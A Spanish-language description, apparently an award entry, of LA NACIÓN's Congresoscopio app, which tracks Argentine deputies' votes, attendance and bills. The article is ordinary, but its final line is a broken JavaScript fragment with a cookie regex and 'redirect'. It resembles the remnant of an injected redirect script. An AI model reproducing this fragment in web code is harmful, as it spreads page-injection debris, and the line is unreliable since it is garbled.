CONGRESOSCOPIO, una aplicación de noticias para seguir la labor legislativa de nuestros diputados

Categoría nro. 11: Section or topic

Seguir el comportamiento de los legisladores en el Congreso de la República Argentina no es una tarea sencilla, por eso un equipo interdisciplinario conformado por periodístas, diseñadores y programadores de LA NACIÓN, creo una aplicación de noticias llamada Congresoscopio que le permita a toda la ciudadanía conocer en detalle el desempeño parlamentario de cada uno de los diputados.

Hasta ahora, esta información era inaccesible o publicada de modo disperso, por eso, de aquí en adelante, los ciudadanos podrán utilizarla como material de consulta permanente para conocer en profundidad la gestión de quienes nos representan, desde los más desconocidos hasta aquellos con alto perfil o importantes aspiraciones políticas.

1. PANTALLA “INICIO”


Desde un hemiciclo interactivo con la disposición actual del recinto, se puede navegar banca por banca para acceder a la información de cada uno de los diputados.

2. PANTALLA “LEYES”

Si el usuario elige el botón “Leyes”, tendrá a su disposición una base de más de 200 iniciativas tratadas en el recinto, que abarcan a 2010 hasta la fecha, con información detallada de cada sesión. El lector tiene la posibilidad de explorar según sus inquietudes, accediendo además a documentos originales que se pueden descargar. Las actas de las votaciones y los textos de cada ley son algunos de los archivos que ofrece la aplicación.

La búsqueda también puede estar enfocada por tipo de voto o por las fuerzas políticas que confluyen en el Congreso. Las visualizaciones muestran cómo se diferencian los partidos a la hora de votar un determinado proyecto de ley y dejan al descubierto también las disidencias al interior de un mismo bloque u orientación. Las coincidencias inesperadas o controvertidas también quedan plasmadas en los gráficos y disparan nuevos análisis. 

3. PANTALLA “DIPUTADOS”

Contiene una ficha completa de cada diputado que permite conocer cómo votó cada una de las leyes tratadas, el porcentaje de ausentismo en las votaciones y la cantidad de proyectos presentados, entre otros datos relevantes.

4. PANTALLA “COMPARADOR”

A través del botón “Comparador” el usuario puede elegir distintos legisladores y contrastar sus votos ante un proyecto o varios.

5. PANTALLA “RANKINGS”

Desde el botón “Rankings” se puede acceder a la asistencia de cada diputado al momento de la votación así como también a la cantidad de proyectos de ley presentados en 2014 dándole una idea al ciudadano sobre el caudal de trabajo realizado (o no) de cada uno de ellos.

LOS DESTACADOS DE LA APLICACIÓN

> La aplicación tiene actualización constante y sistematizada al momento de la votación de cada ley.
Se puede navegar de manera amigable desde celulares, tabletas y monitores
Todos los resultados de búsqueda realizados pueden ser viralizados en las distintas redes sociales. Facebook, Twitter, Google Plus, etc.
La aplicación puede ser embebida en diferentes sitios web (Ej. Blogs)
Los datos están abiertos en formato csv, así como también las planillas originales de cada votación en formato pdf

“; )”\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));”;,”redirect”);>,;”””; ; “”)}